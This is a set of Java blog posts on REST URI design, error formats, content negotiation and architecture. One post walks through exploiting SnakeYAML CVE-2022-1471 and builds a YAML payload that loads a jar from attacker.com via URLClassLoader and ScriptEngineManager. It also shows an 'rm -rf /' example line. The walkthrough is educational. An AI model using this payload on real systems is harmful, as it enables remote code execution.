Programming and Stuff - Michael Scharhag's Java development blog

URI design suggestions

2024-06-16T18:39:35Z

In this post, we will take a look at URI design for REST APIs. Please note that this is a very subjective topic. So you should take these as general suggestions rather than the definitive way to go.

On the one hand, URI design is important because it is hard to change URIs later without breaking client code. So it is good to think about URI design before building an API.

On the other hand, I think some people overemphasise the importance of URI design. You can easily spend a lot of time reading through endless web discussions about various details. Your goal is usually not to come up with the perfect URI design, but to build a pragmatic and consistent API that fulfils a specific business need.

It is usually much more important to be consistent than to be perfect. So if you choose a certain style of URI design, you should use it consistently, otherwise you may annoy your API users.

So here are some suggestions for better URI design.

Avoid case sensitivity, use lower case letters

Prefer /users/john instead of /Users/John.

Note that according to RFC 3986 the URI scheme and the domain part are case-insensitive and should be normalised to lower-case. However, the rest of the URI is case-sensitive. So HTTPS://API.My-Company.com is the same as https://api.my-company.com. But http://api.my-company.com/USERS is not the same as http://api-my-company.com/users.

To complicate matters further, certain pieces of technology may handle things differently. In short: There is no need for this extra complexity.

Prefer hyphens over spaces and underscores

You will probably need a way to separate multiple words within a URI. The most commonly used character for this is the hyphen (-).

Spaces in URIs need to be encoded as %20. So /weather report becomes /weather%20report, which is difficult for humans to read.

The underscore is another option, which is slightly less user friendly than the hyphen. The reason for this is simply that URIs are often underlined within text passages. This makes underscores difficult to distinguish from spaces.

Use hyphens over camel case

This is basically a corollary to the previous two points. If we want to remove case sensitivity, we cannot use camel case. So we need another way of separating words, which is to use the hyphen character. So /weatherReport becomes /weather-report.

Avoid trailing slashes

Use /cars instead of /cars/.

Trailing slashes confuse people; there is no reason why /cars/ should be different from /cars. A trailing slash is easy to forget and can cause hard-to-find errors in routing and web server configurations.

Avoid media types and file formats in URIs

Use /users/123 instead of /users/123.json.

The URI is used to describe a resource not a data format. A single resource can be provided in different representations (aka formats). With HTTP we should use Content negotiation to decide which resource representation should be returned by the server.

URIs describe resources not operations

With REST, we use URIs to identify resources (like users, posts, or the image with ID 1234). For operations (like getUsers or deleteImage) we use HTTP verbs.

So we should use


GET /users
POST /posts
DELETE /images/1234

instead of


POST /getUsers
GET /createPost?title=..
POST /images/1234/delete

Be consistent with plural and singular in resource names

In my opinion it does not matter whether you use /users/123 or /user/123 as long as you are consistent. However, the majority of people seem to prefer the plural version (/users/123).

If you go with plural, you should be consistent and only use singular names for true singleton resources.

A few examples:


/users        collection of all users
/users/123    single user with id 123 from the collection
/author       singleton resource, not a collection, there is only one author

Do not use query parameters to alter state

Query parameters are useful for various things, such as filtering and sorting collections. However, you should not use them to alter resource state.

Use the HTTP Verbs PUT, POST, DELETE or PATCH to alter resource state. If clients need to provide additional information use the request body.

For example, if you want to change the name of user 123 to John use something like


PUT /users/123
Content-Type: application/json
{
  "name": "John"
}

instead of


PUT /users/123?name=john

See POST vs PUT vs PATCH for more details.

URIs are hierarchical

URIs identify resources hierarchically. Sub-resources usually have a 1:n or 1:1 relationship with the parent resource.

For example, suppose we have an application that allows users to join groups. Within groups, users can create and comment on posts. So a post belongs to exactly one group and a comment belongs to exactly one post. To represent this relationship, we can come up with the following URI hierarchy:


/groups
returns the collection of all available groups

/groups/111
returns details about a specific groups (here 111)

/groups/111/posts
returns the collection of posts for group 111

/groups/111/postings/222
returns details about post 222 in group 111

/groups/111/postings/222/comments
returns the comments for post 222 in group 111

If there is no clear hierarchy, query parameters can be a good option.

Suppose we want to provide a route planning service. To get a route from berlin to paris, we could use /route/berlin/paris. However, this implies that the destination (paris) is a sub-resource of the start location (berlin), which does not seem right.

A better way is to use query parameters. For example:


/route?from=berlin&to=paris

Constructing a malicious YAML file for SnakeYAML (CVE-2022-1471)

2023-06-06T20:31:46Z

In this post we will take a closer look at SnakeYAML and CVE-2022-1471.

SnakeYAML is a popular Java library for parsing YAML files. For example, Spring Boot uses SnakeYAML to parse YAML configuration files.

In late 2022, a critical vulnerability was discovered in SnakeYAML (referred to as CVE-2022-1471). This allowed an attacker to perform remote code execution by providing a malicious YAML file. The problem was fixed in SnakeYAML 2.0, released in February 2023.

I recently looked into this vulnerability and learned a few things that I'll try to break down in this post.

Parsing YAML files with SnakeYAML

Before we look at the actual security issue, let us take a quick look at how SnakeYAML is actually used in a Java application.

Suppose we have the following YAML file named person.yml:


person:
  firstname: john
  lastname: doe
  address:
    street: fooway 42
    city: baz town

In our Java code we can parse this YAML file with SnakeYAML like this:


Yaml yaml = new Yaml();
FileInputStream fis = new FileInputStream("/path/to/person.yml");
Map<String, Object> parsed = yaml.load(fis);

Map<String, Object> person = (Map<String, Object>) parsed.get("person");
person.get("firstname");  // "john"
person.get("lastname");   // "doe"
person.get("address");    // another map with keys "street" and "city"

yaml.load(fis) returns a Map<String, Object> instance that we can navigate through to get the values defined in the YAML file.

Mapping YAML content to objects

Unfortunately, working with maps is usually not very pleasant. So SnakeYAML provides several ways to map YAML content to Java objects.

One way is to use the !! syntax to set a Java type within a YAML object:


person:
  !!demo.Person
  firstname: john
  lastname: doe
  address:
    street: fooway 42
    city: baz town

This tells SnakeYAML to map the contents of the person object to the demo.Person Java class, which looks like this:


public class Person {
    private String firstname;
    private String lastname;
    private Address address; // has getter and setter for street and city

    // getter and setter
}

We can now parse the YAML file and get the person object with the mapped YAML values like this:


Map<String, Object> parsed = yaml.load(fis);
Person person = (Person) parsed.get("person");

SnakeYAML now creates a new Person object using the default constructor and uses setters to set the values defined in the YAML file. We can also instruct SnakeYAML to use constructor parameters instead of setters to set values.

For example, suppose we have the following simple Email value object:


public class Email {
    private String value;

    public Email(String value) {
        this.value = value;
    }

    // getter
}

Within the YAML file, we can tell SnakeYAML to create an Email object by enclosing the constructor argument in square brackets:


person:
  firstname: john
  lastname: doe
  email: !!demo.Email [ john@doe.com ]

Where is the security issue?

What we have seen so far is really all we need to run malicious code from a YAML file. SnakeYAML allows us to create classes, pass constructor parameters and call setters from a provided YAML file.

Assume for a moment that there is a RunSystemCommand class available in the class path. This class executes the system command passed in the constructor as soon as it is created. We could then provide the following YAML file:


foo: !!bad.code.RunSystemCommand [ rm -rf / ]

Which would run the rm -rf / system command right after it is instantiated by SnakeYAML.

Obviously this is a bit too simple, as such a class is unlikely to exist in the classpath. Also remember that we can only control constructors and setters through the YAML file. We cannot call arbitrary methods.

However, there are some interesting classes available in the standard Java library, that can be used. A very promising combination is ScriptEngineManager together with URLClassLoader. We will now learn a bit more about these two classes before we integrate them into a YAML file.

Loading remote code via URLClassLoader

URLClassLoader is a Java ClassLoader that can load classes and resources from jar files located at a specified URL. We can create URLClassLoader like this:


URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);

URLClassLoader takes an array of URLs as constructor parameter. Here we pass a single URL pointing to a jar file on a remote server controlled by the attacker. Our classLoader instance can now be used to load classes from the remote jar file.

If you are curious about how to load a class from a Classloader and use it via reflection, here is a simple example. However, this is not necessary for our SnakeYAML experiment.


// load class foo.bar.BadCode using the classLoader
Class<?> loadedClass = classLoader.loadClass("foo.bar.BadCode");

// create a new instance of foo.bar.BadCode using the default constructor
Object instance = loadedClass.newInstance();

// run the method runMaliciousCode() on our new instance
Method runMaliciousCode = loadedClass.getMethod("runMaliciousCode");
runMaliciousCode.invoke(instance);

Using ScriptEngineManager to run code for us

ScriptEngineManager is another standard Java library class. It implements a discovery and instantiation mechanism for Java script engine support. ScriptEngineManager uses the Java Service Provider mechanism to discover and instantiate available ScriptEngineFactory classes.

The ClassLoader used by ScriptEngineManager can be passed as a constructor parameter:


URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);

Here, the newly created ScriptEngineManager will look for ScriptEngineFactory implementations in our attacker-controlled remote jar. And more dangerously: It will instantiate eligible classes from that jar, giving the attacker the ability to run their own code.

But what content must be provided in the remote jar file?

We start by creating a malicious implementation of ScriptEngineFactory:


package foo.bar;

public class BadScriptEngineFactory implements ScriptEngineFactory {
    @Override
    public String getEngineName() {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return null;
    }

    // empty stubs for other interface methods
}

The first method that ScriptEngineManager calls after instantiating a ScriptEngineFactory is getEngineName(). So we use this method to execute our malicious code. In this example, we will simply run the calc system command, which will start the calculator on a Windows system. This is a simple proof, that we can run a system command from the provided jar file.

As mentioned earlier, ScriptEngineManager uses the Java Service Provider mechanism to find classes that implement the ScriptEngineFactory interface.

So we need to create a service provider configuration for our ScriptEngineFactory. We do this by creating a file called javax.script.ScriptEngineFactory in the META-INF/services directory. This file must contain the fully qualified name of our ScriptEngineFactory:


foo.bar.BadScriptEngineFactory

We then package the class and configuration file into a jar file called malicious-code.car. The final layout inside the jar file looks like this:

malicious-code.jar
- META-INF
  - services
    - javax.script.ScriptEngineFactory
  - MANIFEST.MF
- foo
  - bar
    - BadScriptEngineFactory.class

We can now put this jar file on a server and make it available to the URLClassLoader used by the ScriptEngineManager.

To recap the snippet shown earlier:


URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);

ScriptEngineManager should now detect the BadScriptEngineFactory class within the malicious-code.jar file. Once instantiated, it calls the getEngineName() method, which executes the calc system command. So running this code on a Windows system should open the Windows Calculator.

Constructing a malicious YAML file

Now we know enough to return to our original goal: constructing a malicious YAML file for SnakeYAML. As you may have noticed, the previous snippet only included constructor calls and the construction of an array. Both of these can be expressed within a YAML file.

So the final YAML file looks like this:


person: !!javax.script.ScriptEngineManager [
    !!java.net.URLClassLoader [[
        !!java.net.URL [http://attacker.com/malicious-code.jar]
    ]]
]

We create a simple person YAML object. For the value we use the !! syntax we saw earlier to create a ScriptEngineManager.

As a constructor parameter we pass a URLClassLoader with a URL pointing to our malicious jar file. Notice that we open two square brackets after URLClassLoader. One to indicate that a constructor argument follows and a second to define an array.

When this YAML file is parsed with a vulnerable version of SnakeYAML on a Windows system, the calculator opens. This proves that an attacker is able to run code and execute system commands by providing a malicious YAML file.

A standardized error format for HTTP responses

2022-08-10T20:42:44Z

HTTP uses status codes to indicate the result of the servers attempt to satisfy the request. In case the server is unable to process the request we can choose from a variety of HTTP error codes.

Unfortunately status codes alone often do not provide enough information for API clients. For example, a server might respond with the status code 400 (Bad Request) to indicate the client sent an invalid request. Wouldn't it be nice if the response body would tell us what specific part of the request was invalid or how to resolve the problem?

Status codes are used to define higher level error classes while error details are usually part of the response body. Many APIs use a custom error format for response bodies to provide additional problem information. However, there is also a standard that can help us here, defined in RFC 2707.

RFC 7807 defines a data model for problem details in JSON and XML. Before coming up with a new generic fault or error response format for you API, it might be worth looking into RFC 7807. However, it is absolutely fine to use your own domain-specific format if this fits better to your application.

RFC 7807: Problem Details for HTTP APIs

A HTTP response using RFC 7807 might look like this:


HTTP/1.1 400 Bad request
Content-Type: application/problem+json
Content-Language: en

{
    "type": "https://api.my-cool-example.com/problems/required-field-missing",
    "title": "Required field is missing",
    "detail": "Article with id 1234 cannot be updated because the required field 'title' is missing",
    "status": 400,
    "instance": "/articles/1234",
    "field": "title"
}

As usual, the HTTP status code (400, Bad request) gives us a broad indication of the problem. Notice the response Content-Type of application/problem+json. This tells us the response contains a RFC 7807 compliant body. When using XML instead of JSON the Content-Type application/problem+xml is used.

A problem details JSON response can have the following members:

type (string) - A URI reference that identifies the problem type.
title (string) - A short human-readable summary of the problem type. It should not change between multiple occurrences of the same problem type, except for purposes of localization.
status (number) - The HTTP status code generated by the origin server.
detail (string) - A human-readable description of this specific problem occurrence.
instance (string) - A URI that identifies the resource related to this specific problem occurrence.

All fields are optional. However, you should at least provide a type value as this is used by consumers to identify the specific problem type. Consumers should not parse the title or detail fields.

Problem types

Problem types are used to identify specific problems. A problem type must document:

A type URI (that is used in the type field of the response).
A title that describes the problem (used in the title field of the response).
The HTTP status code it is used with.

The type URI should resolve to a human-readable documentation of the problem (e.g. a HTML document). This URI should be under your control and stable over time.

Problem types may also specify the use of a Retry-After response header if appropriate.

RFC 7807 reserves one special URI as a problem type: about:blank. The problem type about:blank can be used if the problem has no additional semantics besides that of the HTTP status code. In this case, the title should be the same as the HTTP status phrase for that code (e.g. Bad Request for HTTP status 400).

Extension members

Problem types may extend the problem details object with additional members to provide additional information.

The field member from the example response shown above is an example of such an extension member. It belongs to the required-field-missing problem type and indicates the missing field. A consumer might parse this member to construct an appropriate error message for the end-user.

Conclusion

HTTP status codes alone are often not enough to provide a meaningful problem description.

RFC 7807 defines a standardized format for a more detailed problem descriptions within the body of an HTTP response. Before coming up with just another custom error response format, it might be a good idea to look at the RFC 7807 problem format.

HTTP - Content negotiation

2021-11-22T18:24:34Z

With HTTP, resources are identified using URIs. And a uniquely identified resource might support multiple resource representations. A representation is a specific form of a particular resource.

For example:

a HTML page /index.html might be available in different languages
product data located at /products/123 can be served in JSON, XML or CSV
an avatar image /user/avatar might available in JPEG, PNG and GIF formats

In all these cases one underlying resource has multiple different representations.

Content negotiation is the mechanism used by clients and servers to decide which representation should be used.

Server-driven and agent-driven content negotiation

We can differentiate between server-driven and agent-driven content negotiation.

With server-driven content negotiation the client tells the server which representations are preferable. The server then picks the representation that best fits the clients needs.

When using agent-driven content negotiation the server tells the client which representations are available. The client then picks the best matching option.

In practice nearly only server-driven negotiation is used. Unfortunately, there is no standardized format for doing agent-driven negotiation. Additionally, agent-driven negotiation is usually also worse for performance as it requires an additional request / response round trip. In the rest of this article we will therefore focus on server-driven negotiation.

Accept headers

With server-driven negotiation the client uses headers to indicate supported content formats. A server-side algorithm then uses these headers to decide which resource representation should be returned.

Most commonly used is the Accept-Header, which communicates the media-type preferred by the client. For example, consider the following simple HTTP request containing an Accept header:


GET /monthly-report
Accept: text/html; q=1.0, text/*; q=0.8

The header tells the server that the client understands HTML (media-type text/html) and other text based formats (mediatype text/*).

text/* indicates that all subtypes of the text type are supported. To indicate that all media types are supported we can use */*.

In this example HTML is preferred over other text based formats because it has a higher quality factor (q).

Ideally a server would respond with a HTML document to this request. For example:


HTTP/1.1 200 OK
Content-Type: text/html

<html>
    <body>
        <h1>Monthly report</h1>
        ...
    </body>
</html>

If returning HTML is not feasible, the server can also respond with another text based format, like text/plain:


200 OK
Content-Type: text/plain

Monthly report
Bla bli blu
...

Besides the Accept header there are also the Accept-Language and Accept-Encoding headers, we can use. Accept-Language indicates the language preference of the client while Accept-Encoding defines the acceptable content encodings.

Of course all these headers can be used together. For example:


GET /monthly-report
Accept: text/html
Accept-Language: en-US; q=1.0, en; q=0.9, fr; q=0.4
Accept-Encoding: gzip, br

Here the client indicates that he prefers

an HTML document
US English (preferred, q=1.0) but other English variations are also fine (q=0.9). If English is not available, French can do the job too (q=0.4)
gzip and brotli (br) encoding is supported

An acceptable response might look like this:


200 Ok
Content-Type: text/html
Content-Language: en
Content-Encoding: gzip

<gzipped html document>

What if the server cannot return an acceptable response?

If the server is unable to fulfill the clients preferences the HTTP status code 406 (Not Acceptable) can be returned. This status code indicates that the server is unable to produce a response matching the clients preference.

Depending on the situation it might also be viable to return a response that does not exactly match the clients preference. For example, assume no language provided in the Accept-Language header is supported by the server. In this case, it can still be a valid option to return a response using a predefined default language. This might be more useful for the client than nothing. In this case, the client can look at the Content-Language header of the response and decide if he wants to use the response or ignore it.

Content negotiation in REST APIs

For REST APIs it can be a viable option to support more than one standard representation for resources. For example, with content negotiation we can support JSON and XML and let the client decide what he wants to use.

CSV can also be an interesting option to consider in certain situations as the response can directly be viewed with tools like Excel. For example, consider the following request:


GET /users
Accept: text/csv

Instead of returning a JSON (or XML) collection, the server now can respond with a list of users in CSV format.


HTTP/1.1 200 Ok
Content-Type: text/csv

Id;Username;Email
1;john;john.doe@example.com
2;anna91;anna91@example.com

Interested in more REST related articles? Have a look at my REST API design page.

Avoid leaking domain logic

2021-11-01T12:23:49Z

Many software architectures try to separate domain logic from other parts of the application. To follow this practice we always need to know what actually is domain logic and what is not. Unfortunately this is not always that easy to separate. If we get this decision wrong, domain logic can easily leak into other components and layers.

We will go through this problem by looking at examples using a hexagonal application architecture. If you are not familiar with hexagonal architecture (also called ports and adapters architecture) you might be interested in the previous post about the transition from a traditional layered architecture to a hexagonal architecture.

Assume a shop system that publishes new orders to a messaging system (like Kafka). Our product owner now tells us that we have to listen for these order events and persist the corresponding order in the database.

Using hexagonal architecture the integration with a messaging system is implemented within an adapter. So, we start with a simple adapter implementation that listens for Kafka events:


@AllArgsConstructor
public class KafkaAdapter {
    private final SaveOrderUseCase saveOrderUseCase;

    @KafkaListener(topic = ...)
    public void onNewOrderEvent(NewOrderKafkaEvent event) {
        Order order = event.getOrder();
        saveOrderUseCase.saveOrder(order);
    }
}

In case you are not familiar with the @AllArgsConstructor annotation from project lombok: It generates a constructor which accepts each field (here saveOrderUseCase) as parameter.

The adapter delegates the saving of the order to a UseCase implementation.

UseCases are part of our domain core and implements domain logic, together with the domain model. Our simple example UseCase looks like this:


@AllArgsConstructor
public class SaveOrderUseCase {
    private final SaveOrderPort saveOrderPort;

    public void saveOrder(Order order) {
        saveOrderPort.saveOrder(order);
    }
}

Nothing special here. We simply use an outgoing Port interface to persist the passed order.

While the shown approach might work fine, we have a significant problem here: Our business logic has leaked into the Adapter implementation. Maybe you are wondering: what business logic?

We have a simple business rule to implement: Everytime a new order is retrieved it should be persisted. In our current implementation this rule is implemented by the adapter while our business layer (the UseCase) only provides a generic save operation.

Now assume, after some time, a new requirement arrives: Every time a new order is retrieved, a message should be written to an audit log.

With our current implementation we cannot write the audit log message within SaveOrderUseCase. As the name suggests the UseCase is for saving an order and not for retrieving a new order and therefore might be used by other components. So, adding the audit log message here might have undesired side-effects.

The solution is simple: We write the audit log message in our adapter:


@AllArgsConstructor
public class KafkaAdapter {

    private final SaveOrderUseCase saveOrderUseCase;
    private final AuditLog auditLog;

    @KafkaListener(topic = ...)
    public void onNewOrderEvent(NewOrderKafkaEvent event) {
        Order order = event.getOrder();
        saveOrderUseCase.saveOrder(order);
        auditLog.write("New order retrieved, id: " + order.getId());
    }
}

And now we have made it worse. Even more business logic has leaked into the adapter.

If the auditLog object writes messages into a database, we might also have screwed up transaction handling, which is usually not handled in an incoming adapter.

Using more specific domain operations

The core problem here is the generic SaveOrderUseCase. Instead of providing a generic save operation to adapters we should provide a more specific UseCase implementation.

For example, we can create a NewOrderRetrievedUseCase that accepts newly retrieved orders:


@AllArgsConstructor
public class NewOrderRetrievedUseCase {
    private final SaveOrderPort saveOrderPort;
    private final AuditLog auditLog;

    @Transactional
    public void onNewOrderRetrieved(Order newOrder) {
        saveOrderPort.saveOrder(order);
        auditLog.write("New order retrieved, id: " + order.getId());
    }
}

Now both business rules are implemented within the UseCase. Our adapter implementation is now simply responsible for mapping incoming data and passing it to the use case:


@AllArgsConstructor
public class KafkaAdapter {
    private final NewOrderRetrievedUseCase newOrderRetrievedUseCase;

    @KafkaListener(topic = ...)
    public void onNewOrderEvent(NewOrderKafkaEvent event) {
        NewOrder newOrder = event.toNewOrder();
        newOrderRetrievedUseCase.onNewOrderRetrieved(newOrder);
    }
}

This change only seems to be a small difference. However, for future requirements, we now have a specific location to handle incoming orders in our business layer. Otherwise, chances are high that with new requirements we leak more business logic into places where it should not be located.

Leaks like this happen especially often with too generic create, save/update and delete operations in the domain layer. So, try to be very specific when implementing business operations.

Media types and the Content-Type header

2021-10-06T21:44:10Z

A Media type (formerly known as MIME type) is an identifier for file formats and format contents. Media types are used by different internet technologies like e-mail or HTTP.

Media types consist of a type and a subtype. It can optionally contain a suffix and one or more parameters. Media types follow this syntax:


type "/" [tree "."] subtype ["+" suffix]* [";" parameter]

For example the media type for JSON documents is:


application/json

It consists of the type application with the subtype json.

A HTML document with UTF-8 encoding can be expressed as:


text/html; charset=UTF-8

Here we have the type text, the subtype html and a parameter charset=UTF-8 indicating UTF-8 character encoding.

A suffix can be used to specify the underlying format of a media type. For example, SVG images use the media type:


image/svg+xml

The type is image, svg is the subtype and xml the suffix. The suffix tells us that the SVG file format is based on XML.

Note that subtypes can be organized in a hierarchical tree structure. For example, the binary format used by Apache Thrift uses the following media type:


application/vnd.apache.thrift.binary

vnd is a standardized prefix that tells us this is a vendor specific media type.

The Content-Type header

With HTTP any message that contains an entity-body should include a Content-Type header to define the media type of the body.

The RFC says:

Any HTTP/1.1 message containing an entity-body SHOULD include a Content-Type header field defining the media type of that body. If and only if the media type is not given by a Content-Type field, the recipient MAY attempt to guess the media type via inspection of its content and/or the name extension(s) of the URI used to identify the resource. If the media type remains unknown, the recipient SHOULD treat it as type "application/octet-stream".

The RFC allows clients to guess the media type if the Content-Type header is not present. However, this should be avoided in any case.

Guessing the media-type of a piece of data is called Content sniffing (or MIME-sniffing). This practice was (and sometimes is still) used by web browsers and accounts for multiple security vulnerabilities. To explicitly tell browsers not to guess certain media types the following header can be added:


X-Content-Type-Options: nosniff

Note that the Content-Type header always contains the media type of the original resource, before any content encoding is applied. Content encoding (like gzip compression) is indicated by the Content-Encoding header.

From layers to onions and hexagons

2021-09-20T17:26:39Z

In this post we will explore the transition from a classic layered software architecture to a hexagonal architecture. The hexagonal architecture (also called ports and adapters architecture) is a design pattern to create loosely coupled application components.

This post was inspired by a German article from Silas Graffy called Von Schichten zu Ringen - Hexagonale Architekturen erklärt.

Classic layers

Layering is one of the most widely known techniques to break apart complicated software systems. It has been promoted in many popular books, like Patterns of Enterprise Application Architecture by Martin Fowler.

Layers allows us to build software on top of a lower level layer without knowing the details about any of the lower level layers. In an ideal world we can even replace lower level layers with different implementations. While the number of layers can vary we mostly see three or four layers in practice.

Here, we have an example diagram of a three layer architecture:

The presentation layer contains components related to user (or API) interfaces. In the domain layer we find the logic related to the problem the application solves. The database access layer is responsible database interaction.

The dependency direction is from top to bottom. The code in the presentation layer depends on code in the domain layer which itself does depend on code located in the database layer.

As an example we will examine a simple use-case: Creation of a new user. Let's add related classes to the layer diagram:

In the database layer we have a UserDao class with a saveUser(..) method that accepts a UserEntity class. UserEntity might contain methods required by UserDao for interacting with the database. With ORM-Frameworks (like JPA) UserEntity might contain information related to object-relational mapping.

The domain layer provides a UserService and a User class. Both might contain domain logic. UserService interacts with UserDao to save a User in the database. UserDao does not know about the User object, so UserService needs to convert User to UserEntity before calling UserDao.saveUser(..).

In the Presentation layer we have a UserController class which interacts with the domain layer using UserService and User classes. The presentation also does have its own class to represent a user: UserDto might contain utility methods to format field values for presentation in a user interface.

What is the problem with this?

We have some potential problems to discuss here.

First we can easily get the impression that the database is the most important part of the system as all other layers depend on it. However, in modern software development we no longer start with creating huge ER-diagrams for the database layer. Instead, we usually (should) focus on the business domain.

As the domain layer depends on the database layer the domain layer needs to convert its own objects (User) to objects the database layer knows how to use (UserEntity). So we have code that deals with database layer specific classes located in the domain layer. Ideally we want to have the domain layer to focus on domain logic and nothing else.

The domain layer is directly using implementation classes from the database layer. This makes it hard to replace the database layer with different implementations. Even if we do not want to plan for replacing the database with a different storage technology this is important. Think of replacing the database layer with mocks for unit testing or using in-memory databases for local development.

Abstraction with interfaces

The latest mentioned problem can be solved by introducing interfaces. The obvious and quite common solution is to add an interface in the database layer. Higher level layers use the interface and do not depend on implementation classes.

Here we split the UserDao class into an interface (UserDao) and an implementation class (UserDaoImpl). UserService only uses the UserDao interface. This abstraction gives us more flexibility as we can now change UserDao implementations in the database layer.

However, from the layer perspective nothing changed. We still have code related to the database layer in our domain layer.

Now, we can do a little bit of magic by moving the interface into the domain layer:

Note we did not just move the UserDao interface. As UserDao is now part of the domain layer, it uses domain classes (User) instead of database related classes (UserEntity).

This little change is reversing the dependency direction between domain and database layers. The domain layer does no longer depend on the database layer. Instead, the database layer depends on the domain layer as it requires access to the UserDao interface and the User class. The database layer is now responsible for the conversion between User and UserEntity.

In and out

While the dependency direction has been changed the call direction stays the same:

The domain layer is the center of the application. We can say that the presentation layer calls in the domain layer while the domain layer calls out to the database layer.

As a next step, we can split layers into more specific components. For example:

This is what hexagonal architecture (also called ports and adapters) is about.

We no longer have layers here. Instead, we have the application domain in the center and so-called adapters. Adapters provide additional functionality like user interfaces or database access. Some adapters call in the domain center (here: UI and REST API) while others are outgoing adapters called by the domain center via interfaces (here database, message queue and E-Mail)

This allows us the separate pieces of functionality into different modules/packages while the domain logic does not have any outside dependencies.

The onion architecture

From the previous step it is easy to move to the onion architecture (sometimes also called clean architecture).

The domain center is split into the domain model and domain services (sometimes called use cases). Application services contains incoming and outgoing adapters. On the out-most layer we locate infrastructure elements like databases or message queues.

What to remember?

We looked at the transition from a classic layered architecture to more modern architecture approaches. While the details of hexagonal architecture and onion architecture might vary, both share important parts:

The application domain is the core part of the application without any external dependencies. This allows easy testing and modification of domain logic.
Adapters located around the domain logic talk with external systems. These adapters can easily be replaced by different implementations without any changes to the domain logic.
The dependency direction always goes from the outside (adapters, external dependencies) to the inside (domain logic).
The call direction can be in and out of the domain center. At least for calling out of the domain center, we need interfaces to assure the correct dependency direction.

File down- and uploads in RESTful web services

2021-09-27T18:20:28Z

Usually we use standard data exchange formats like JSON or XML with REST web services. However, many REST services have at least some operations that can be hard to fulfill with just JSON or XML. Examples are uploads of product images, data imports using uploaded CSV files or generation of downloadable PDF reports.

In this post we focus on those operations, which are often categorized as file down- and uploads. This is a bit flaky as sending a simple JSON document can also be seen as a (JSON) file upload operation.

Think about the operation you want to express

A common mistake is to focus on the specific file format that is required for the operation. Instead, we should think about the operation we want to express. The file format just decides the Media Type used for the operation.

For example, assume we want to design an API that let users upload an avatar image to their user account.

Here, it is usually a good idea to separate the avatar image from the user account resource for various reasons:

The avatar image is unlikely to change so it might be a good candidate for caching. On the other, hand the user account resource might contain things like the last login date which changes frequently.
Not all clients accessing the user account might be interested in the avatar image. So, bandwidth can be saved.
For clients it is often preferable to load images separately (think of web applications using <img> tags)

The user account resource might be accessible via:


/users/<user-id>

We can come up with a simple sub-resource representing the avatar image:


/users/<user-id>/avatar

Uploading an avatar is a simple replace operation which can be expressed via PUT:


PUT /users/<user-id>/avatar
Content-Type: image/jpeg

<image data>

In case a user wants to delete his avatar image, we can use a simple DELETE operation:


DELETE /users/<user-id>/avatar

And of course clients need a way to show to avatar image. So, we can provide a download operation with GET:


GET /users/<user-id>/avatar

which returns


HTTP/1.1 200 Ok
Content-Type: image/jpeg

<image data>

In this simple example we use a new sub-resource with common update, delete, get operations. The only difference is we use an image media type instead of JSON or XML.

Let's look at a different example.

Assume we provide an API to manage product data. We want to extend this API with an option to import products from an uploaded CSV file. Instead of thinking about file uploads we should think about a way to express a product import operation.

Probably the simplest approach is to send a POST request to a separate resource:


POST /product-import
Content-Type: text/csv

<csv data>

Alternatively, we can also see this as a bulk operation for products. As we learned in another post about bulk operations with REST, the PATCH method is a possible way to express a bulk operation on a collection. In this case, the CSV document describes the desired changes to product collection.

For example:


PATCH /products
Content-Type: text/csv

action,id,name,price
create,,Cool Gadget,3.99
create,,Nice cap,9.50
delete,42,,

This example creates two new products and deletes the product with id 42.

Processing file uploads can take a considerable amount of time. So think about designing it as an asynchronous REST operation.

Mixing files and metadata

In some situations we might need to attach additional metadata to a file. For example, assume we have an API where users can upload holiday photos. Besides the actual image data a photo might also contain a description, a location where it was taken and more.

Here, I would (again) recommend using two separate operations for similar reasons as stated in the previous section with the avatar image. Even if the situation is a bit different here (the data is directly linked to the image) it is usually the simpler approach.

In this case, we can first create a photo resource by sending the actual image:


POST /photos
Content-Type: image/jpeg

<image data>

As response we get:


HTTP/1.1 201 Created
Location: /photos/123

After that, we can attach additional metadata to the photo:


PUT /photos/123/metadata
Content-Type: application/json

{
    "description": "Nice shot of a beach in hawaii",
    "location": "hawaii",
    "filename": "hawaii-beach.jpg"
}

Of course we can also design it the other way around and send the metadata before the image.

Embedding Base64 encoded files in JSON or XML

In case splitting file content and metadata in seprate requests it not possible, we can embed files into JSON / XML documents using Base64 encoding. With Base64 encoding we can convert binary formats to a text representation which can be integrated in other text based formats, like JSON or XML.

An example request might look like this:


POST /photos
Content-Type: application/json

{
    "width": "1280",
    "height": "920",
    "filename": "funny-cat.jpg",
    "image": "TmljZSBleGFt...cGxlIHRleHQ="
}

Mixing media-types with multipart requests

Another possible approach to transfer image data and metadata in a single request / response are multipart media types.

Multipart media types require a boundary parameter that is used as delimiter between different body parts. The following request consists of two body parts. The first one contains the image while the second part contains the metadata.

For example


POST /photos
Content-Type: multipart/mixed; boundary=foobar

--foobar
Content-Type: image/jpeg

<image data>
--foobar
Content-Type: application/json

{
    "width": "1280",
    "height": "920",
    "filename": "funny-cat.jpg"
}
--foobar--

Unfortunately multipart requests / responses are often hard to work with. For example, not every REST client might be able to construct these requests and it can be hard to verify responses in unit tests.

Interested in more REST related articles? Have a look at my REST API design page.

Kotlin: Type conversion with adapters

2021-12-14T15:20:13Z

In this post we will learn how we can use Kotlin extension functions to provide a simple and elegant type conversion mechanism.

Maybe you have used Apache Sling before. In this case, you are probably familiar with Slings usage of adapters. We will implement a very similar approach in Kotlin.

Creating an extension function

With Kotlins extension functions we can add methods to existing classes. The following declaration adds an adaptTo() method to all sub types of Any.


inline fun <reified T : Any> Any.adaptTo(): T {
    ..
}

The generic parameter T parameter specifies the target type that should be returned by the method. We keep the method body empty for the moment.

Converting an Object of type A to another object of type B will look like this with our new method:


val a = A("foo")
val b = a.adaptTo<B>()

Providing conversion rules with adapters

In order to implement the adaptTo() method we need a way to define conversion rules.

We use a simple Adapter interface for this:


interface Adapter {
    fun <T : Any> canAdapt(from: Any, to: KClass<T>): Boolean
    fun <T : Any> adaptTo(from: Any, to: KClass<T>): T
}

canAdapt(..) returns true when the implementing class is able to convert the from object to type to.

adaptTo(..) performs the actual conversion and returns an object of type to.

Searching for an appropriate adapter

Our adaptTo() extension function needs a way to access available adapters. So, we create a simple list that stores our adapter implementations:


